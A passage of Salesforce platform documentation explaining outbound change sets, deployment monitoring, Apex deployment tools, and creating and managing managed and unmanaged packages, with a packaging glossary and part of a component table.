components exist in every organization this change set will be deployed to, it's a good idea to add dependent
components to the change set.

See Also:
Creating an Outbound Change Set
Viewing and Adding Dependent Components to a Change Set
Components Available in Change Sets

Viewing and Adding Dependent Components to a Change
Set

A dependency is a relationship where one or more components must exist for another component to exist. It's a good idea to
add dependent components to a change set, unless you are sure that the dependent components exist in every organization
where this change set will be deployed.

To add dependent components to an outbound change set:

1. From Setup, click Deploy > Outbound Change Sets.
2. In the Change Sets list, click the name of a change set.
3. Click View/Add Dependencies.
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4. On the Component Dependencies page, select the dependent components you wish to deploy and click Add to Change
Set.

Warning:  If your change set contains more than 2500 dependencies you will only be able to see the first 2500 in the
view dependencies page.

See Also:
Selecting Components for an Outbound Change Set
Uploading an Outbound Change Set
Components Available in Change Sets

Uploading an Outbound Change Set
Once you’ve assembled the components in a change set, you can upload it to another organization. Note that once you upload
a change set, you can't edit it or recall it.

1. From Setup, click Deploy > Outbound Change Sets.
2. Click the name of a change set.
3. Select the organization you want to send the change set to.
4. Click Upload.

Note:  Outbound change sets expire six months after upload, at which time the change set is permanently deleted.

See Also:
Uploading Change Sets During Server Upgrades
Creating an Outbound Change Set

Creating an Outbound Change Set
An outbound change set is a change you want to send from the organization you are logged into to another organization. To
view outbound change sets, from Setup, click Deploy > Outbound Change Sets.

• To create a new change set, click New.

• To view the details of an existing change set, click its name.

See Also:
Cloning an Outbound Change Set
Outbound Change Set Validation Errors
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Cloning an Outbound Change Set
You can create a copy of an existing change set by cloning it.

1. From Setup, click Deploy > Outbound Change Sets.
2. Click the name of the change set you want to clone.
3. Click Clone.

See Also:
Creating an Outbound Change Set

Deleting an Outbound Change Set
To delete an outbound change set:

1. From Setup, click Deploy > Outbound Change Sets.
2. Click the name of the change set you want to delete.
3. Click Delete.

See Also:
Creating an Outbound Change Set

Outbound Change Set Validation Errors
If you receive an error about cross-version validation, then the organization used to create the outbound change set is running
on a different platform version than the organization receiving the change set. This error typically occurs during upgrades,
because organizations may be upgraded at different times. If you receive this error, you can only deploy those components that
are compatible between versions.

See Also:
Creating an Outbound Change Set
Uploading an Outbound Change Set

Uploading Change Sets During Server Upgrades
During server upgrades, production and sandbox environments may not be running the same version of the platform. Some
components may have new functionality or other changes that will not allow you to deploy that type of component until the
production organization is running the same version as sandbox.
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If you upload a change set that has components that can't be deployed because they are incompatible with the older version,
the system detects which components can't be deployed, and gives you the option of uploading the remaining components.

See Also:
Uploading an Outbound Change Set

Monitoring Metadata Deployments
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Modify All Data”To view metadata deployments:

You can use the Metadata API to deploy XML file representations of components into an organization. A component is an
instance of a metadata type in the Metadata API. For example, CustomObject is a metadata type for custom objects, and the
MyCustomObject__c component is an instance of a custom object.

The easiest way to access the Metadata API is to use the Force.com IDE or Force.com Migration Tool. These tools are built
on top of the Metadata API and use the standard Eclipse and Ant tools respectively to simplify the task of working with the
Metadata API.

The deploy call in the Metadata API is asynchronous and may take a while to complete. The Force.com IDE and Force.com
Migration Tool use the deploy call to move XML file representations of components into an organization. To track the status
of deployments that are in progress or completed in the last 7 days for these tools or other clients that are deploying metadata,
from Setup, click Monitor > Deployments.

On the Monitoring Deployments page, you can cancel a deployment while it’s in progress. To cancel a deployment, click
Abort. The deployment then has the status “Abort Requested” until the deployment is completely canceled.

The Deployments In Progress list contains the following columns:

DescriptionColumn

A unique identifier used to track the deployment.Deployment
Id

The name of the user performing the deployment.Created By

The date and time when the deployment started.Start Time

Indicates whether this deployment is being used to check the validity of the deployed files without making
any changes in the organization. A validate-only deployment does not deploy any components or change
the organization in any way.

Validate
Only

The following values are possible:Status

• Queued—The deployment has not started. It is waiting in a queue.

• In Progress—The deployment has started, but has not completed yet.
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DescriptionColumn

• Abort Requested—The deployment is being rolled back, but is not yet fully canceled.

• Processing Type: type—The deployment has started, and is processing a metadata type, where type
is a metadata type, such as CustomObject.

• Processing name—The deployment has started, and is processing a component, where name is a
component name, such as MyCustomObject__c.

• Running Test ApexClass.testName—An Apex test class is running, where ApexClass is the Apex
class name and testName is the name of the test.

The progress of the deployment. For example, 10 / 15 (3 errors) indicates that ten components
have been processed successfully out of a total of 15. There were errors for three other components processed
so far.

Components

The progress of the Apex tests that have been run. For example, 13 / 20 (2 errors) indicates that
13 tests have been run successfully out of a total of 20. There were errors for two other tests that have run

Tests

so far. The value for the total number of tests is not accurate until the test phase of the deployment has
started.

The Completed Deployments Last 7 days list contains the following columns. Completed deployments are removed from the
list 7 days after completion.

DescriptionColumn

A unique identifier used to track the deployment.Deployment
Id

The name of the user who performed the deployment.Created By

The date and time when the deployment started.Start Time

The date and time when the deployment completed.End Time

Indicates whether this deployment is being used to check the validity of the deployed files without making
any changes in the organization. A validate-only deployment does not deploy any components or change
the organization in any way.

Validate
Only

The following values are possible:Status

• Completed—The deployment completed successfully.

• Completed with Errors—The deployment completed, but some components failed to deploy or some
tests failed. This status cannot happen in a production organization as any errors cause the deployment
to be rolled back.

• Failed—The deployment had some errors and no changes were made to the organization.

The number of components, including those with errors, that were processed in the deployment. For
example, 10 (1 error) indicates that ten components were processed and there was an error for one
component.

Components

3791

Monitoring Metadata DeploymentsDeploy



DescriptionColumn

The number of Apex tests, including those with errors, that were run. For example, 13 (2 errors)

indicates that 13 tests were run and there were errors for two tests.
Tests

See Also:
Inbound Change Sets
Outbound Change Sets

DEPLOYMENT TOOLS

Using Tools for Developing and Deploying Apex
Available in: Unlimited, Developer, Enterprise, and Database.com Editions

User Permissions Needed

“Author Apex”To use the Apex Deployment Tool:

Use the following tools to develop and deploy Apex.

Developer Console

The Developer Console is an integrated development environment with a collection of tools you can use to create, debug, and
test applications in your Salesforce organization.
To open the Developer Console, click <Your name> > Developer Console

Force.com IDE

You can download the Force.com IDE to help you write Apex in projects that mirror your organization. Using this tool, you
can also compile and test the code you write, synchronize changes between the organization and project, and deploy your code
to another organization.

Force.com Migration Tool

Download the Force.com Migration Tool if you want to use a script for deploying Apex from a Developer Edition or sandbox
organization to a Database.com production organization using Apache's Ant build tool.

To download the Force.com Migration Tool:

1. From Setup, click Develop > Tools.
2. Click Force.com Migration Tool.
3. Save the salesforce_ant.zip file and unzip its contents to the location of your choice.
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The salesforce_ant.zip file contains the files you need to run an ant task that exercises the compileAndTest API call,
including:

• A Readme.html file that explains how to use the tools
• A Jar file containing the ant task: ant-salesforce.jar
• A sample folder containing:

◊ A codepkg\classes folder that contains SampleDeployClass.cls and SampleFailingTestClass.cls
◊ A codepkg\triggers folder that contains SampleAccountTrigger.trigger
◊ A mypkg\objects folder that contains the custom objects used in the examples
◊ A removecodepkg folder that contains XML files for removing the examples from your organization
◊ A sample build.properties file that you must edit, specifying your credentials, in order to run the sample ant tasks

in build.xml
◊ A sample build.xml file, that exercises the deploy and retrieve API calls

For more information on the syntax and use of Apex, see the Force.com Apex Code Developer's Guide.

Note:  The Force.com IDE and Force.com Migration Tool are free resources provided by salesforce.com to support
its users and partners, but are not considered part of our Services for purposes of the salesforce.com Master Subscription
Agreement.

See Also:
Using the Developer Console
Deploying Apex Using the Force.com IDE
Deploying Apex Using the Force.com Migration Tool

Deploying Apex Using the Force.com IDE
Available in: Unlimited, Developer, Enterprise, and Database.com Editions

User Permissions Needed

“Author Apex”To use the Apex Deployment Tool:

You can download the Force.com IDE to help you write Apex in projects that mirror your organization. Using this tool, you
can also compile and test the code you write, synchronize changes between the organization and project, and deploy your code
to another organization.

3793

Deploying Apex Using the Force.com IDEDeployment Tools

http://www.salesforce.com/us/developer/docs/apexcode/index.htm


Note:  The Force.com IDE is a free resource provided by salesforce.com to support its users and partners, but is not
considered part of our Services for purposes of the salesforce.com Master Subscription Agreement.

See Also:
Deploying Apex Using Change Sets
Deploying Apex Using SOAP API
Using Tools for Developing and Deploying Apex

Deploying Apex Using the Force.com Migration Tool
Available in: Unlimited, Developer, Enterprise, and Database.com Editions

User Permissions Needed

“Author Apex”To use the Apex Deployment Tool:

Download the Force.com Migration Tool if you want to use a script for deploying Apex from a Developer Edition or sandbox
organization to a Database.com production organization using Apache's Ant build tool.

To download the Force.com Migration Tool:

1. From Setup, click Develop > Tools.
2. Click Force.com Migration Tool.
3. Save the salesforce_ant.zip file and unzip its contents to the location of your choice.

The salesforce_ant.zip file contains the files you need to run an ant task that exercises the compileAndTest API call,
including:

• A Readme.html file that explains how to use the tools

• A Jar file containing the ant task: ant-salesforce.jar

• A sample folder containing:

◊ A codepkg\classes folder that contains SampleDeployClass.cls and SampleFailingTestClass.cls

◊ A codepkg\triggers folder that contains SampleAccountTrigger.trigger

◊ A mypkg\objects folder that contains the custom objects used in the examples

◊ A removecodepkg folder that contains XML files for removing the examples from your organization

◊ A sample build.properties file that you must edit, specifying your credentials, in order to run the sample ant tasks
in build.xml

◊ A sample build.xml file, that exercises the deploy and retrieve API calls

For more information on the syntax and use of Apex, see the Force.com Apex Code Developer's Guide.
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Note:  The Force.com Migration Tool is a free resource provided by salesforce.com to support its users and partners,
but is not considered part of our Services for purposes of the salesforce.com Master Subscription Agreement.

See Also:
Deploying Apex Using Change Sets
Deploying Apex Using SOAP API
Using Tools for Developing and Deploying Apex

Deploying Apex Using Change Sets
Available in: Unlimited, Enterprise, and Database.com Editions

User Permissions Needed

“Author Apex”To use the Apex Deployment Tool:

You can deploy Apex classes and triggers between connected organizations, for example, from a sandbox organization to your
production organization. You can create an outbound change set in the Salesforce user interface and add the Apex components
that you would like to upload and deploy to the target organization. To access change sets, from Setup, click Deploy.

See Also:
Change Sets Overview
Deploying Apex Using SOAP API
Using Tools for Developing and Deploying Apex

Deploying Apex Using SOAP API
Available in: Unlimited, Developer, Enterprise, and Database.com Editions

User Permissions Needed

“Author Apex”To use the Apex Deployment Tool:

You can use the following SOAP API to deploy your Apex to a development or sandbox organization.

• compileAndTest()

• compileClasses()

• compileTriggers()
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All these calls take Apex code that contains the class or trigger, as well as the values for any fields that need to be set.

To learn more about these SOAP API calls, see the SOAP API and SOAP Headers for Apex appendix in the Force.com Apex
Code Developer's Guide.

See Also:
Deploying Apex Using Change Sets
Using Tools for Developing and Deploying Apex
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Introduction
This guide provides information about packaging and distributing apps built using the Force.com platform. It has the following
sections.

Working with Packages

This explains the details of creating and working with managed packages, so your app can be easily installed in other
organizations.

Distributing Apps

This explains how to distribute your apps, either through the AppExchange or through your own website. It also covers
the basics of pushing upgrades to your subscribers.

Supporting Subscribers of Your App

This explains how to log in to subscriber organizations to provide support and troubleshoot problems.

For more information on these topics, refer to the ISVforce Guide or visit the Salesforce Partner Portal.

WORKING WITH PACKAGES

Overview of Packages
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create AppExchange Packages”To create packages:

“Upload AppExchange Packages”To upload packages to the AppExchange:

A package is a container for something as small as an individual component or as large as a set of related apps. After creating
a package, you can distribute it to other Salesforce users and organizations, including those outside your company.

Packages come in two forms—unmanaged and managed:

PACKAGE AND DISTRIBUTE YOUR APPS
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Unmanaged packages

Unmanaged packages are typically used to distribute open-source projects or application templates to provide developers
with the basic building blocks for an application. Once the components are installed from an unmanaged package, the
components can be edited in the organization they are installed in. The developer who created and uploaded the
unmanaged package has no control over the installed components, and can't change or upgrade them. Unmanaged
packages should not be used to migrate components from a sandbox to production organization. Instead, use Change
Sets.

Managed packages

Managed packages are typically used by salesforce.com partners to distribute and sell applications to customers. These
packages must be created from a Developer Edition organization. Using the AppExchange and the License Management
Application (LMA), developers can sell and manage user-based licenses to the app. Managed packages are also fully
upgradeable. To ensure seamless upgrades, certain destructive changes, like removing objects or fields, can not be
performed.

Managed packages also offer the following benefits:
• Intellectual property protection for Apex

• Built-in versioning support for API accessible components

• The ability to branch and patch a previous version

• The ability to seamlessly push patch updates to subscribers

• Unique naming of all components to ensure conflict-free installs

The following definitions illustrate these concepts:

Figure 25: Unmanaged and Managed Packages

Components

A component is one constituent part of a package. It defines an item, such as a custom object or a custom field. You can
combine components in a package to produce powerful features or applications. In an unmanaged package, components
are not upgradeable. In a managed package, some components can be upgraded while others can’t.

Attributes

An attribute is a field on a component, such as the name of an email template or the Allow Reports checkbox on a
custom object. On a non-upgradeable component in either an unmanaged or managed package, attributes are editable
by both the developer (the one who created the package) and the subscriber (the one who installed the package). On an
upgradeable component in a managed package, some attributes can be edited by the developer, some can be edited by
the subscriber, and some are locked, meaning they can’t be edited by either the developer or subscriber.

For information on which components can be included in a package and which attributes are editable for each component,
see the Force.com Quick Reference for Developing Packages.

Packages consist of one or more Salesforce components, which, in turn, consist of one or more attributes. Components and
their attributes behave differently in managed and unmanaged packages.
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If you plan to distribute an app, it is important to consider packaging throughout the development process. For example:

• While creating your app, consider how components and their attributes behave in different packages and Salesforce editions.

• While preparing your app for distribution, consider how you want to release it to your customers.

• While installing a package, consider your organization's security and license agreements.

See Also:
Managing Packages
Preparing Your Apps for Distribution

Glossary
The following terms and definitions describe key application and packaging concepts and capabilities:

App

Short for “application.” A collection of components such as tabs, reports, dashboards, and Visualforce pages that address
a specific business need. Salesforce provides standard apps such as Sales and Call Center. You can customize the standard
apps to match the way you work. In addition, you can package an app and upload it to the AppExchange along with
related components such as custom fields, custom tabs, and custom objects. Then, you can make the app available to
other Salesforce users from the AppExchange.

AppExchange

The AppExchange is a sharing interface from salesforce.com that allows you to browse and share apps and services for
the Force.com platform.

Beta, Managed Package

In the context of managed packages, a beta managed package is an early version of a managed package distributed to a
sampling of your intended audience to test it.

Deploy

To move functionality from an inactive state to active. For example, when developing new features in the Salesforce user
interface, you must select the “Deployed” option to make the functionality visible to other users.

The process by which an application or other functionality is moved from development to production.

To move metadata components from a local file system to a Salesforce organization.

For installed apps, deployment makes any custom objects in the app available to users in your organization. Before a
custom object is deployed, it is only available to administrators and any users with the “Customize Application” permission.

License Management Application (LMA)

A free AppExchange app that allows you to track sales leads and accounts for every user who downloads your managed
package (app) from the AppExchange.

License Management Organization (LMO)

The Salesforce organization that you use to track all the Salesforce users who install your package. A license management
organization must have the License Management Application (LMA) installed. It automatically receives notification
every time your package is installed or uninstalled so that you can easily notify users of upgrades. You can specify any
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Enterprise, Unlimited, or Developer Edition organization as your license management organization. For more information,
go to http://www.salesforce.com/docs/en/lma/index.htm.

Major Release

A significant release of a package. During these releases, the major and minor numbers of a package version increase to
any chosen value.

Managed Package

A collection of application components that is posted as a unit on the AppExchange and associated with a namespace
and possibly a License Management Organization. To support upgrades, a package must be managed. An organization
can create a single managed package that can be downloaded and installed by many different organizations. Managed
packages differ from unmanaged packages by having some locked components, allowing the managed package to be
upgraded later. Unmanaged packages do not include locked components and cannot be upgraded. In addition, managed
packages obfuscate certain components (like Apex) on subscribing organizations to protect the intellectual property of
the developer.

Managed Package Extension

Any package, component, or set of components that adds to the functionality of a managed package. You cannot install
an extension before installing its managed package.

Namespace Prefix

In a packaging context, a namespace prefix is a one to 15-character alphanumeric identifier that distinguishes your
package and its contents from packages of other developers on AppExchange. Namespace prefixes are case-insensitive.
For example, ABC and abc are not recognized as unique. Your namespace prefix must be globally unique across all
Salesforce organizations. It keeps your managed package under your control exclusively.

Package

A group of Force.com components and applications that are made available to other organizations through the
AppExchange. You use packages to bundle an app along with any related components so that you can upload them to
AppExchange together.

Package Dependency

This is created when one component references another component, permission, or preference that is required for the
component to be valid. Components can include but are not limited to:
• Standard or custom fields

• Standard or custom objects

• Visualforce pages

• Apex code

Permissions and preferences can include but are not limited to:
• Divisions

• Multicurrency

• Record types

Package Installation

Installation incorporates the contents of a package into your Salesforce organization. A package on the AppExchange
can include an app, a component, or a combination of the two. After you install a package, you may need to deploy
components in the package to make it generally available to the users in your organization.
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Package Version

A package version is a number that identifies the set of components uploaded in a package. The version number has the
format majorNumber.minorNumber.patchNumber (for example, 2.1.3). The major and minor numbers increase to
a chosen value during every major release. The patchNumber is generated and updated only for a patch release.

Unmanaged packages are not upgradeable, so each package version is simply a set of components for distribution. A
package version has more significance for managed packages. Packages can exhibit different behavior for different versions.
Publishers can use package versions to evolve the components in their managed packages gracefully by releasing subsequent
package versions without breaking existing customer integrations using the package. See also Patch and Patch Development
Organization.

Patch

A patch enables a developer to change the functionality of existing components in a managed package, while ensuring
subscribing organizations that there are no visible behavior changes to the package. For example, you can add new
variables or change the body of an Apex class, but you may not add, deprecate, or remove any of its methods. Patches
are tracked by a patchNumber appended to every package version. See also Patch Development Organization and
Package Version.

Patch Development Organization

The organization where patch versions are developed, maintained, and uploaded. Patch development organizations are
created automatically for a developer organization when they request to create a patch. See also Patch and Package
Version.

Patch Release

A minor upgrade to a managed package. During these releases, the patch number of a package version increments.

Publisher

The publisher of an AppExchange listing is the Salesforce user or organization that published the listing.

Push Upgrade

A method of delivering updates that sends upgrades of an installed managed package to all organizations that have
installed the package.

Subscriber

The subscriber of a package is a Salesforce user with an installed package in their Salesforce organization.

Test Drive

A test drive is a fully functional Salesforce organization that contains an app and any sample records added by the
publisher for a particular package. It allows users on AppExchange to experience an app as a read-only user using a
familiar Salesforce interface.

Unmanaged Package

A package that cannot be upgraded or controlled by its developer.

Upgrading

Upgrading a package is the process of installing a newer version. Salesforce supports upgrades for managed packages
that are not beta.
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Uploading

Uploading a package in Salesforce provides an installation URL so other users can install it. Uploading also makes your
packaged available to be published on AppExchange.

See Also:
What is an App?

Creating Managed Packages
Available in: Developer Edition

Package uploads and installs are available in Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To enable managed packages:

“Create AppExchange packages”To create packages:

“Download AppExchange packages”To upload packages:

Creating a managed package is just as easy as creating an unmanaged package. The only requirement to create a managed
package is that you’re using a Developer Edition organization.

Before creating a managed package:

• Review the information about managed packages in the ISVforce Guide to determine if this is the right type of package
for your app.

• Optionally, install the License Management Application (LMA) from http://sites.force.com/appexchange. Search for
License Management App to locate it. The License Management Application (LMA) tracks information about each
user who installs your app. It allows you to track what users have which version, giving you a means of distributing
information about upgrades.

The License Management Application (LMA) can be installed in any Salesforce organization except a Personal, Group,
or Professional Edition organization and does not need to be the same Salesforce organization that you use to create or
upload the package, although it can be. You can also use the same License Management Application (LMA) to manage
an unlimited number of your managed packages in different Developer Edition organizations.
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• Configure your developer settings. Your developer settings specify your namespace prefix, the Salesforce organization
where you install the License Management Application (LMA), and the unmanaged package you want to convert into a
managed package.

See Also:
About Managed Packages
Configuring Your Developer Settings
Registering a Namespace Prefix
Specifying a License Management Organization
Managing Packages
Converting Unmanaged Packages to Managed
Configuring Your Developer Settings
Registering a Namespace Prefix
Specifying a License Management Organization

About Managed Packages

Available in: Developer Edition

Package uploads and installs are available in Group, Professional, Enterprise, Unlimited, and Developer Editions

A managed package is a collection of application components that are posted as a unit on AppExchange, and are associated
with a namespace and a License Management Organization.

• You must use a Developer Edition organization to create and work with a managed package.

• Managed packages are depicted by the following icons:

◊ Managed - Beta
◊ Managed - Released
◊ Managed - Installed

Tip: To prevent naming conflicts, Salesforce recommends using managed packages for all packages that contain
Apex. This way, all of the Apex objects contain your namespace prefix. For example, if there is an Apex class called
MyHelloWorld and the namespace for your organization is OneTruCode, the class is referenced as
OneTruCode.MyHelloWorld.

See Also:
Creating Managed Packages
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Configuring Your Developer Settings

Available in: Developer Edition

Package uploads and installs are available in Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To configure developer settings:

“Create AppExchange Packages”To create packages:

“Upload AppExchange Packages”To upload packages:

The developer settings in a Developer Edition organization allow you to create a single managed package, upload that package
to Force.com AppExchange, allowing other users to install and upgrade the package in their organization. After configuring
your developer settings the first time, you can no longer modify them. Regardless of the developer settings, you can always
create an unlimited number of unmanaged packages.

Before configuring your developer settings, review the requirements and steps in Creating Managed Packages on page 3802.

To configure your developer settings:

1. From Setup, click Create > Packages.
2. Click Edit.

Note:  This button does not appear if you have already configured your developer settings.

3. Review the selections necessary to configure developer settings, and click Continue.
4. Register a namespace prefix.
5. Choose the package you want to convert to a managed package. If you do not yet have a package to convert, leave this

selection blank and update it later.
6. Click Review My Selections.
7. Click Save.

Tip:  You may want to specify a License Management Organization (LMO) for your managed package; to find out
more, go to http://sites.force.com/appexchange/publisherHome.

See Also:
Creating Managed Packages
Creating Managed Packages
Registering a Namespace Prefix
Specifying a License Management Organization
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Registering a Namespace Prefix

Available in: Developer Edition

Package uploads and installs are available in Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To configure developer settings:

“Create AppExchange Packages”To create packages:

“Upload AppExchange Packages”To upload packages:

In a packaging context, a namespace prefix is a one to 15-character alphanumeric identifier that distinguishes your package
and its contents from packages of other developers on AppExchange. Namespace prefixes are case-insensitive. For example,
ABC and abc are not recognized as unique. Your namespace prefix must be globally unique across all Salesforce organizations.
It keeps your managed package under your control exclusively.

Salesforce automatically prepends your namespace prefix, followed by two underscores (“__”), to all unique component names
in your Salesforce organization. A unique package component is one that requires a name that no other component has within
Salesforce, such as custom objects, custom fields, custom links, s-controls, and validation rules. For example, if your namespace
prefix is abc and your managed package contains a custom object with the API name, Expense__c, use the API name
abc__Expense__c to access this object using the API. The namespace prefix is displayed on all component detail pages.

Warning: S-controls stored in the s-control library or the Documents tab that do not use the Force.com API still
function properly after you register a namespace prefix. However, s-controls stored outside of your organization or
s-controls that use the Force.com API to call Salesforce may require some fine-tuning. For more information, see
S-control in the Object Reference.

Your namespace prefix must:

• Begin with a letter

• Contain one to 15 alphanumeric characters

• Not contain two consecutive underscores

To register a namespace prefix:

1. From Setup, click Create > Packages.
2. Click Edit.

Note:  This button does not appear if you have already configured your developer settings.

3. Review the selections necessary to configure developer settings and click Continue.
4. Enter the namespace prefix you want to register.
5. Click Check Availability to determine if it is already in use.
6. Repeat if the namespace prefix you entered is not available.
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7. Click Review My Selections.
8. Click Save.

See Also:
Creating Managed Packages
Creating Managed Packages
Configuring Your Developer Settings
Specifying a License Management Organization

Specifying a License Management Organization

Available in: Developer Edition

Package uploads and installs are available in Group, Professional, Enterprise, Unlimited, and Developer Editions

A license management organization is a Salesforce organization that you use to track all Salesforce users who install your
managed package. The license management organization receives notification (in the form of a lead record) when a user installs
or uninstalls your package and tracks each package upload on Force.com AppExchange.

Your license management organization can be any Salesforce Enterprise, Unlimited, or Developer Edition organization that
has installed the free License Management Application (LMA) from AppExchange. To specify a License Management
Organization, go to http://sites.force.com/appexchange/publisherHome.

See Also:
Creating Managed Packages
Creating Managed Packages
Configuring Your Developer Settings
Registering a Namespace Prefix

Managing Packages
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Upload AppExchange packages”To upload packages:

Packages are a collection of Force.com components and applications that are made available to other organizations through
the AppExchange. A managed package is a collection of application components that are posted as a unit on AppExchange,
and are associated with a namespace and a License Management Organization. To support upgrades, a package must be
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managed. An organization can create a single managed package that can be downloaded and installed by many different
organizations. Managed packages differ from unmanaged packages by having some locked components, allowing the managed
package to be upgraded later. Unmanaged packages do not include locked components and cannot be upgraded. In addition,
managed packages obfuscate certain components (like Apex) on subscribing organizations to protect the intellectual property
of the developer.

For details, see the Force.com Quick Reference for Developing Packages.

To manage your packages, from Setup, click Create > Packages. For more customization, see Configuring Your Developer
Settings on page 3804.

From the list of packages, you can do any of the following:

• Click New to create a new package, enter a package name and description, and click Save to store it in your list of packages.

• Click Edit to update the package properties.

• Click Del to delete the package. The components contained in your package are not deleted.

• Click the name of the package to view the details of the package.

Note: To create a test drive or choose a License Management Organization (LMO) for what you have uploaded,
click Proceed to AppExchange from the package upload detail page.

See Also:
About Package Versions
Creating and Editing a Package
Adding Components to Your Package
Available Components
Protected Components
Components Automatically Added to Packages
Editing Components and Attributes After Installation
Component Behavior in Packages
About Permission Sets and Profile Settings in Packages
Overview of Packages
Viewing Package Details
Creating and Editing a Package

About Package Versions

Available in: Developer Edition

Package uploads and installs are available in Group, Professional, Enterprise, Unlimited, and Developer Editions

A package version is a number that identifies the set of components uploaded in a package. The version number has the format
majorNumber.minorNumber.patchNumber (for example, 2.1.3). The major and minor numbers increase to a chosen value
during every major release. The patchNumber is generated and updated only for a patch release. Unmanaged packages are
not upgradeable, so each package version is simply a set of components for distribution. A package version has more significance
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for managed packages. Packages can exhibit different behavior for different versions. Publishers can use package versions to
evolve the components in their managed packages gracefully by releasing subsequent package versions without breaking existing
customer integrations using the package.

Version numbers depend on the package release type, which identifies the way packages are distributed. There are two kinds:

Major Release

A major release denotes a Managed - Released package. During these releases, the major and minor numbers of a
package version increase to a chosen value.

Patch Release

A patch release is only for patch versions of a package. During these releases, the patch number of a package version
increments.

When an existing subscriber installs a new package version, there is still only one instance of each component in the package,
but the components can emulate older versions. For example, a subscriber may be using a managed package that contains an
Apex class. If the publisher decides to deprecate a method in the Apex class and release a new package version, the subscriber
still sees only one instance of the Apex class after installing the new version. However, this Apex class can still emulate the
previous version for any code that references the deprecated method in the older version.

Package developers can use conditional logic in Apex classes and triggers to exhibit different behavior for different versions.
This allows the package developer to continue to support existing behavior in classes and triggers in previous package versions
while continuing to evolve the code.

When you are developing client applications using the API, you can specify the version of each package that you use in your
integrations.

See Also:
Managing Packages
Managing Packages
Planning the Release of Managed Packages
Developer's Guide: Force.com Apex Code Developer's Guide
Developer's Guide: Web Services API Developer's Guide

Creating and Editing a Package

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create AppExchange Packages”To create packages:

An app can contain many different components and you can create, upload, and register your apps on your own timeline. To
group components in a container to upload to Force.com AppExchange, create a package and add components to the package.
A package is the container for the app that you must use to upload all its components together.
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Tip:  Before you begin, determine if you want to create and upload a managed or unmanaged package.

To create a new package:

1. From Setup, click Create > Packages.
2. Click New.
3. Enter a name for your package. This does not have to be the same name that appears on AppExchange.
4. From the drop-down menu, select the default language of all component labels in the package.
5. Optionally, choose a custom link from the Configure Custom Link field to display configuration information to

installers of your app. You can select a predefined custom link to a URL or s-control that you have created for your home
page layouts; see the Configure Option on page 3861. The custom link displays as a Configure link within Salesforce on
the Force.com AppExchange Downloads page and app detail page of the installer's organization.

6. Optionally, in the Notify on Apex Error field, enter the username of the person who should receive an email notification
if an exception occurs in Apex that is not caught by the Apex code. If you do not specify a username, all uncaught exceptions
generate an email notification that is sent to salesforce.com. This is only available for managed packages. For more
information, see Handling Apex Exceptions in Managed Packages on page 3579.

Note: Apex can only be packaged from Developer, Enterprise, and Unlimited Edition organizations.

7. Optionally, enter a description that describes the package. You will have a chance to change this description before you
upload it to AppExchange.

8. Optionally, specify a post install script. This is an Apex script that runs in the subscriber organization after the package is
installed or upgraded. For more information, see Running Apex on Package Install/Upgrade.

9. Optionally, specify an uninstall script. This is an Apex script that runs in the subscriber organization after the package is
uninstalled. For more information, see Running Apex on Package Uninstall.

10. Click Save.

After you create a package you can do any of the following:

• View the package details

• Add components to the package

• Upload the package

See Also:
Managing Packages
Viewing Package Details
Preparing Your Apps for Distribution
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Adding Components to Your Package

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create AppExchange Packages”To create packages:

After you have created a package, you need to add components to it, such as app, object, Apex classes or Visualforce pages.
These packages can be uploaded to share with others privately or posted on Force.com AppExchange to share publicly.

To add components to a package, from Setup, click Create > Packages and select the name of the package you want to add
components to. From the package detail page:

1. Click Add.
2. From the drop-down list, choose the type of component you want to add to your package.

• At the top of the list, click a letter to display the contents of the sorted column that begin with that character.
• If available, click the Next Page (or Previous Page) link to go to the next or previous set of components.
• If available, click fewer or more at the bottom of the list to view a shorter or longer display list.

3. Select the components you want to add.

Note:  Some components cannot be added to Managed - Released packages. For a list of these components,
see Developing Packages for Distribution.

S-controls cannot be added to packages with restricted API access.

4. Click Add To Package.

See Also:
Managing Packages
Managing Packages
Viewing Package Details
Preparing Your Apps for Distribution

Available Components
Not all components can be packaged for distribution. If you create an app that uses components that aren't packageable, your
subscribers will have to create and configure those components after they install your app. If ease of installation is an important
concern for your subscribers, keep the packageable components in mind as you develop.

The following table shows the components that are available in a managed package, and whether or not it is updateable or
deleteable. The following sections describe the table columns and their values.
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Upgradeable

Some components are updated to a newer version when a package is upgraded.
• No: The component is not upgraded.

• Yes: The component is upgraded.

Subscriber Deletable

A subscriber or installer of a package can delete the component.
• No: The subscriber cannot delete the component.

• Yes: The subscriber can delete the component.

Developer Deletable

A developer can delete some components after the package is uploaded as Managed - Released. Deleted components
are not deleted in the subscriber's organization during a package upgrade. The Protectable attribute contains more details
on deleting components.
• No: The developer cannot delete a Managed - Released component.

• Yes: The developer can delete a Managed - Released component.

Protectable

Developers can mark certain components as protected. Protected components can’t be linked to or referenced by
components created in a subscriber organization. A developer can delete a protected component in a future release
without worrying about failing installations. However, once a component is marked as unprotected and is released
globally, the developer can’t delete it. When the subscriber upgrades to a version of the package where the component
is deleted, the component is removed from the subscriber's organization.
• No: The component cannot be marked protected.

• Yes: The component can be marked protected.

IP Protection

Certain components automatically include intellectual property protection, such as obfuscating Apex code. The only
exceptions are Apex methods declared as global, meaning that the method signatures can be viewed by the subscriber.
The information in the components you package and publish might be visible to users on AppExchange. Use caution
when adding your code to a custom s-control, formula, Visualforce page, or any other component that you cannot hide
in your app.
• No: The component does not support intellectual property protection.

• Yes: The component supports intellectual property protection.

IP ProtectionProtectableDeveloper
Deletable

Subscriber
Deletable

UpgradeableComponent

NoNoNoNoYesAction

NoNoYesYesNoAnalytic Snapshot

YesNoYes (if not set to
global access)

NoYesApex Class
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IP ProtectionProtectableDeveloper
Deletable

Subscriber
Deletable

UpgradeableComponent

NoNoNoNoYesApex Sharing
Reason

NoNoYesYesNoApex Sharing
Recalculation

YesNoYes (if not set to
global access)

NoYesApex Trigger

NoNoYesYesNoApplication

NoNoNoNoYesArticle Type

NoNoNoYesNoCall Center

NoNoYesYesYesConnected App

NoNo, except custom
links (for Home
page only)

Yes, if protectedNoYesCustom Button or
Link

